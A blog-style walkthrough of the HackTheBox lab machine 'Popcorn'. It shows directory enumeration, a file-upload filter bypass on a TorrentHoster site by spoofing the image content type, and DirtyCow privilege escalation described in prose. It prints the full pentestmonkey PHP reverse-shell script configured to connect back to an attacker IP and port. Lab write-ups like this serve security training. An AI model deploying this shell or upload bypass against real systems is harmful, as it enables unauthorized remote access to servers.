HackTheBox “Popcorn” Walkthrough
12 min readJul 22, 2023
Popcorn, a medium-level Linux OS machine on HackTheBox, through meticulous enumeration, we stumbled upon an instance of TorrentHoster, which allowed us to upload an image which is actually a reverse shell payload and bypass its filtering mechanisms, granting us the crucial initial foothold with a user-level shell. Then, we exploited a system vulnerability utilizing the DirtyCow exploit, ultimately securing a coveted root shell.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
Visit the target at port 80.
Nothing interesting, so, the subsequent action involves executing a Feroxbuster scan to identify concealed files or directories:
└─$ sudo feroxbuster -u http://10.10.10.6 -X 404,403
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.6
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💢 Regex Filter │ 404
💢 Regex Filter │ 403
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 10l 30w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 4l 25w 177c http://10.10.10.6/
200 GET 4l 25w 177c http://10.10.10.6/index
200 GET 652l 3096w 47101c http://10.10.10.6/test.php
200 GET 654l 3106w 47232c http://10.10.10.6/test
301 GET 9l 28w 310c http://10.10.10.6/torrent => http://10.10.10.6/torrent/
200 GET 0l 0w 0c http://10.10.10.6/torrent/download
200 GET 1l 11w 182c http://10.10.10.6/torrent/logout
301 GET 9l 28w 313c http://10.10.10.6/torrent/js => http://10.10.10.6/torrent/js/
200 GET 6l 14w 321c http://10.10.10.6/torrent/stylesheet.css
200 GET 0l 0w 0c http://10.10.10.6/torrent/config
200 GET 104l 237w 2054c http://10.10.10.6/torrent/css/lightbox.css
301 GET 9l 28w 314c http://10.10.10.6/torrent/lib => http://10.10.10.6/torrent/lib/
200 GET 45l 266w 2152c http://10.10.10.6/torrent/js/scriptaculous.js
301 GET 9l 28w 317c http://10.10.10.6/torrent/upload => http://10.10.10.6/torrent/upload/
200 GET 2l 0w 4c http://10.10.10.6/torrent/secure
200 GET 0l 0w 0c http://10.10.10.6/torrent/lib/dblib.php
200 GET 0l 0w 0c http://10.10.10.6/torrent/lib/stdlib.php
200 GET 0l 0w 0c http://10.10.10.6/torrent/lib/BDecode.php
200 GET 0l 0w 0c http://10.10.10.6/torrent/lib/webtorrent.php
200 GET 0l 0w 0c http://10.10.10.6/torrent/lib/getscrape.php
200 GET 0l 0w 0c http://10.10.10.6/torrent/lib/BEncode.php
301 GET 9l 28w 316c http://10.10.10.6/torrent/users => http://10.10.10.6/torrent/users/
200 GET 903l 2738w 31969c http://10.10.10.6/torrent/js/effects.js
200 GET 689l 1962w 20711c http://10.10.10.6/torrent/js/lightbox.js
200 GET 1785l 4607w 47603c http://10.10.10.6/torrent/js/prototype.js
200 GET 117l 857w 83698c http://10.10.10.6/torrent/upload/d0d14c926e6e99761a2fdcff27b403d96376eff6.jpg
200 GET 172l 1672w 95315c http://10.10.10.6/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.png
200 GET 118l 741w 60101c http://10.10.10.6/torrent/upload/noss.png
200 GET 293l 882w 11366c http://10.10.10.6/torrent/index
200 GET 138l 809w 51153c http://10.10.10.6/torrent/preview
200 GET 0l 0w 0c http://10.10.10.6/torrent/edit
200 GET 18l 109w 6455c http://10.10.10.6/torrent/images/link-forum.png
200 GET 10l 51w 4166c http://10.10.10.6/torrent/images/link-home.png
200 GET 2l 6w 371c http://10.10.10.6/torrent/images/close.gif
200 GET 6l 17w 946c http://10.10.10.6/torrent/images/leftcor.png
200 GET 7l 39w 3737c http://10.10.10.6/torrent/images/login2.jpg
200 GET 1l 5w 77c http://10.10.10.6/torrent/images/reg.gif
200 GET 10l 25w 2538c http://10.10.10.6/torrent/images/search.jpg
200 GET 11l 58w 4049c http://10.10.10.6/torrent/images/link-upload.png
200 GET 3l 13w 1627c http://10.10.10.6/torrent/images/details.png
200 GET 24l 98w 3885c http://10.10.10.6/torrent/images/loading.gif
200 GET 11l 73w 5552c http://10.10.10.6/torrent/images/statics.jpg
200 GET 1l 2w 127c http://10.10.10.6/torrent/images/sidebarspace.gif
200 GET 1l 1w 121c http://10.10.10.6/torrent/images/background.gif
200 GET 10l 44w 3861c http://10.10.10.6/torrent/images/link-stats.png
200 GET 10l 45w 3361c http://10.10.10.6/torrent/images/seeds.jpg
200 GET 8l 48w 4023c http://10.10.10.6/torrent/images/link-browse.png
200 GET 18l 137w 6625c http://10.10.10.6/torrent/images/register%20user.gif
200 GET 6l 26w 2087c http://10.10.10.6/torrent/images/th.png
200 GET 4l 18w 1896c http://10.10.10.6/torrent/images/folder.png
200 GET 5l 12w 732c http://10.10.10.6/torrent/images/login2.gif
200 GET 8l 30w 2495c http://10.10.10.6/torrent/images/rightcor.png
200 GET 22l 65w 4944c http://10.10.10.6/torrent/images/files%20screenshot.jpg
200 GET 11l 47w 4799c http://10.10.10.6/torrent/images/green%20mark.jpg
200 GET 13l 65w 5137c http://10.10.10.6/torrent/images/edit.jpg
200 GET 62l 328w 25091c http://10.10.10.6/torrent/images/feed2.png
200 GET 55l 314w 23001c http://10.10.10.6/torrent/images/stats.png
200 GET 66l 389w 34759c http://10.10.10.6/torrent/images/banner.jpg
200 GET 92l 609w 56889c http://10.10.10.6/torrent/images/button.png
200 GET 87l 629w 58643c http://10.10.10.6/torrent/images/login.png
301 GET 9l 28w 317c http://10.10.10.6/torrent/images => http://10.10.10.6/torrent/images/
301 GET 9l 28w 316c http://10.10.10.6/torrent/admin => http://10.10.10.6/torrent/admin/
301 GET 9l 28w 320c http://10.10.10.6/torrent/templates => http://10.10.10.6/torrent/templates/
200 GET 16l 92w 936c http://10.10.10.6/torrent/comment
200 GET 99l 667w 64670c http://10.10.10.6/torrent/images/updatestats.png
301 GET 9l 28w 314c http://10.10.10.6/torrent/css => http://10.10.10.6/torrent/css/
200 GET 87l 652w 64417c http://10.10.10.6/torrent/images/mytorrents.png
200 GET 81l 600w 61018c http://10.10.10.6/torrent/images/logout.png
200 GET 1l 0w 1c http://10.10.10.6/torrent/templates/form_header.php
200 GET 5l 13w 98c http://10.10.10.6/torrent/templates/insufficient_privileges.php
200 GET 37l 83w 1111c http://10.10.10.6/torrent/templates/torrents_list_date.php
302 GET 0l 0w 0c http://10.10.10.6/torrent/templates/modify.php => ../../index.php
301 GET 9l 28w 317c http://10.10.10.6/torrent/health => http://10.10.10.6/torrent/health/
200 GET 5l 28w 247c http://10.10.10.6/torrent/templates/directory.php
200 GET 2l 15w 153c http://10.10.10.6/torrent/templates/torrent_details.php
200 GET 4l 17w 161c http://10.10.10.6/torrent/templates/news2.php
200 GET 3l 15w 153c http://10.10.10.6/torrent/templates/torrents_list.php
200 GET 3l 5w 180c http://10.10.10.6/torrent/health/2.gif
200 GET 3l 4w 171c http://10.10.10.6/torrent/health/1.gif
200 GET 4l 6w 195c http://10.10.10.6/torrent/health/3.gif
200 GET 3l 4w 211c http://10.10.10.6/torrent/health/5.gif
200 GET 3l 4w 199c http://10.10.10.6/torrent/health/4.gif
301 GET 9l 28w 323c http://10.10.10.6/torrent/admin/images => http://10.10.10.6/torrent/admin/images/
200 GET 4l 33w 1775c http://10.10.10.6/torrent/admin/images/files%20management.gif
200 GET 11l 24w 1814c http://10.10.10.6/torrent/admin/images/users%20management.gif
200 GET 10l 47w 3170c http://10.10.10.6/torrent/admin/images/add%20subcategories.jpg
200 GET 12l 32w 2978c http://10.10.10.6/torrent/admin/images/browse.jpg
200 GET 13l 45w 4116c http://10.10.10.6/torrent/admin/images/comments.jpg
200 GET 12l 39w 2775c http://10.10.10.6/torrent/admin/images/ban%20users.jpg
200 GET 9l 55w 4052c http://10.10.10.6/torrent/admin/images/logout.png
200 GET 17l 55w 4152c http://10.10.10.6/torrent/admin/images/list%20torrents.jpg
200 GET 12l 39w 4100c http://10.10.10.6/torrent/admin/images/edit%20news.jpg
200 GET 8l 47w 3301c http://10.10.10.6/torrent/admin/images/hack.jpg
200 GET 7l 29w 3224c http://10.10.10.6/torrent/admin/images/users.jpg
200 GET 8l 35w 3745c http://10.10.10.6/torrent/admin/images/add%20news.jpg
200 GET 7l 35w 1828c http://10.10.10.6/torrent/admin/images/news%20management.gif
200 GET 9l 51w 4132c http://10.10.10.6/torrent/admin/images/list%20categories.jpg
301 GET 9l 28w 319c http://10.10.10.6/torrent/database => http://10.10.10.6/torrent/database/
200 GET 3l 9w 483c http://10.10.10.6/torrent/images/top-bg.jpg
200 GET 13l 61w 5012c http://10.10.10.6/torrent/admin/images/users.png
200 GET 9l 61w 4944c http://10.10.10.6/torrent/admin/images/dead%20torrents.jpg
200 GET 230l 1247w 9821c http://10.10.10.6/torrent/database/th_database.sql
200 GET 227l 489w 8373c http://10.10.10.6/torrent/login
200 GET 1l 4w 80c http://10.10.10.6/torrent/admin/users
200 GET 6l 9w 443c http://10.10.10.6/torrent/images/orange%20bg.jpg
200 GET 185l 476w 9280c http://10.10.10.6/torrent/browse
200 GET 12l 47w 3408c http://10.10.10.6/torrent/images/news-arrow.gif
200 GET 5l 25w 1617c http://10.10.10.6/torrent/images/feed.png
200 GET 7l 36w 1886c http://10.10.10.6/torrent/images/download.png
200 GET 7l 40w 2617c http://10.10.10.6/torrent/images/back.gif
200 GET 1l 6w 96c http://10.10.10.6/torrent/images/regb.gif
200 GET 21l 112w 8368c http://10.10.10.6/torrent/images/logo.png
200 GET 6l 18w 1130c http://10.10.10.6/torrent/users/img
301 GET 9l 28w 326c http://10.10.10.6/torrent/users/templates => http://10.10.10.6/torrent/users/templates/
200 GET 13l 66w 4332c http://10.10.10.6/torrent/images/control%20panel.gif
200 GET 6l 27w 295c http://10.10.10.6/torrent/users/templates/change_settings_form.php
200 GET 20l 63w 629c http://10.10.10.6/torrent/users/templates/signup_form.php
200 GET 4l 17w 107c http://10.10.10.6/torrent/users/templates/forgot_password_success.php
200 GET 23l 96w 787c http://10.10.10.6/torrent/users/templates/forgot_password_form.php
200 GET 3l 8w 449c http://10.10.10.6/torrent/images/top-end.jpg
200 GET 5l 11w 440c http://10.10.10.6/torrent/images/button-bg.jpg
200 GET 2l 14w 674c http://10.10.10.6/torrent/images/page_bg.jpg
200 GET 12l 78w 5360c http://10.10.10.6/torrent/images/link-news.png
200 GET 1l 4w 80c http://10.10.10.6/torrent/users/index
200 GET 6l 14w 321c http://10.10.10.6/torrent/stylesheet
200 GET 87l 622w 60051c http://10.10.10.6/torrent/images/admin.png
200 GET 3l 25w 1670c http://10.10.10.6/torrent/images/closelabel.gif
200 GET 10l 59w 4133c http://10.10.10.6/torrent/images/link-development.png
200 GET 88l 634w 62088c http://10.10.10.6/torrent/images/register.png
200 GET 1l 4w 80c http://10.10.10.6/torrent/admin/index
200 GET 17l 70w 4429c http://10.10.10.6/torrent/images/link-faq.png
301 GET 9l 28w 319c http://10.10.10.6/torrent/torrents => http://10.10.10.6/torrent/torrents/
200 GET 1l 1w 55c http://10.10.10.6/torrent/images/blank.gif
200 GET 6l 34w 3691c http://10.10.10.6/torrent/images/download%20details.jpg
200 GET 8l 24w 2155c http://10.10.10.6/torrent/images/folder2.png
200 GET 11l 68w 6491c http://10.10.10.6/torrent/images/globe.jpg
200 GET 19l 88w 7594c http://10.10.10.6/torrent/images/link-about.png
200 GET 0l 0w 0c http://10.10.10.6/torrent/torrents/index
200 GET 11l 50w 3064c http://10.10.10.6/torrent/thumbnail
200 GET 2l 16w 163c http://10.10.10.6/torrent/users/templates/registration_success.php
200 GET 2l 18w 174c http://10.10.10.6/torrent/users/templates/users_menu.php
200 GET 7l 28w 331c http://10.10.10.6/torrent/users/templates/change_password_form.php
200 GET 237l 482w 8181c http://10.10.10.6/torrent/users/registration
200 GET 134l 306w 3767c http://10.10.10.6/torrent/hide
301 GET 9l 28w 317c http://10.10.10.6/torrent/readme => http://10.10.10.6/torrent/readme/
200 GET 38l 246w 3412c http://10.10.10.6/torrent/readme/readme.html
200 GET 215l 474w 7915c http://10.10.10.6/torrent/users/forgot_password
301 GET 9l 28w 309c http://10.10.10.6/rename => http://10.10.10.6/rename/
200 GET 1l 4w 95c http://10.10.10.6/rename/index
200 GET 0l 0w 0c http://10.10.10.6/torrent/upload_file
200 GET 0l 0w 0c http://10.10.10.6/torrent/validator
200 GET 1l 4w 80c http://10.10.10.6/torrent/users/change_password
301 GET 9l 28w 314c http://10.10.10.6/torrent/PNG => http://10.10.10.6/torrent/PNG/
200 GET 782l 5541w 485764c http://10.10.10.6/torrent/PNG/banner.png
[####################] - 3m 180276/180276 0s found:154 errors:2521
[####################] - 3m 30000/30000 174/s http://10.10.10.6/
[####################] - 3m 30000/30000 167/s http://10.10.10.6/torrent/
[####################] - 11s 30000/30000 2739/s http://10.10.10.6/torrent/images/ => Directory listing
[####################] - 3m 30000/30000 161/s http://10.10.10.6/torrent/admin/
[####################] - 12s 30000/30000 2464/s http://10.10.10.6/torrent/templates/ => Directory listing
[####################] - 1s 30000/30000 34562/s http://10.10.10.6/torrent/js/ => Directory listing
[####################] - 0s 30000/30000 114068/s http://10.10.10.6/torrent/css/ => Directory listing
[####################] - 7s 30000/30000 4324/s http://10.10.10.6/torrent/lib/ => Directory listing
[####################] - 1s 30000/30000 29268/s http://10.10.10.6/torrent/upload/ => Directory listing
[####################] - 3m 30000/30000 169/s http://10.10.10.6/torrent/users/
[####################] - 0s 30000/30000 95541/s http://10.10.10.6/torrent/health/ => Directory listing
[####################] - 7s 30000/30000 4198/s http://10.10.10.6/torrent/admin/images/ => Directory listing
[####################] - 0s 30000/30000 73529/s http://10.10.10.6/torrent/database/ => Directory listing
[####################] - 7s 30000/30000 4368/s http://10.10.10.6/torrent/users/templates/ => Directory listing
[####################] - 3m 30000/30000 170/s http://10.10.10.6/torrent/torrents/
[####################] - 7s 30000/30000 4214/s http://10.10.10.6/torrent/readme/ => Directory listing
[####################] - 3m 30000/30000 188/s http://10.10.10.6/rename/
[####################] - 5s 30000/30000 5829/s http://10.10.10.6/torrent/PNG/ => Directory listingChecking /test directory, we can see that file uploads functionality is allowed.
Let’s have a look at the /torrent directory.
We are required to have an account to be able to upload files.
Now, we have an account.
Checking the upload option.
Download a sample torrent file from here and upload it.
After successfully uploading the torrent file, we are redirected to the following page. From there, we just click on the “Edit this torrent” option.
Exploitation:
Upon encountering another window featuring an upload option for updating a screenshot, we promptly run Burp Suite and then download the reverse shell PHP file from here. Subsequently, we edited the IP and port information within the PHP payload, as illustrated below.
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.8'; // CHANGE THIS
$port = 4343; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>Now, browse for the php payload file.
While Burp Suite is running, we intercept the “Submit Screenshot” request.
We edit the content type of the intercepted request to be image/png.
Forward.
Php payload is uploaded.
From the results of the Feroxbuster scan, we have the following directory http://10.10.10.6/torrent/upload/
Excellent news! Our file upload has been successful. Let’s start a listener according to our php payload.
Now, we click on the recently modified file in the uploaded content which has a php extension.
Et voilà, we now have a user-level shell.
Privilege Escalation:
Let’s have a look at the machine.
With a quick online/searchspoit reserch, we can see that this box could be vulnerable to DirtyCow exploit 2016–5195.
Let’s download it and start an HTTP server.
Download the exploit on the target machine and compile it.
We are asked for the password of the firefart user profile that will be set by the exploit.
And after a minute.
We switch to firefart user profile, put the password, and BOOM! we get a root privileges shell.
Cheers.
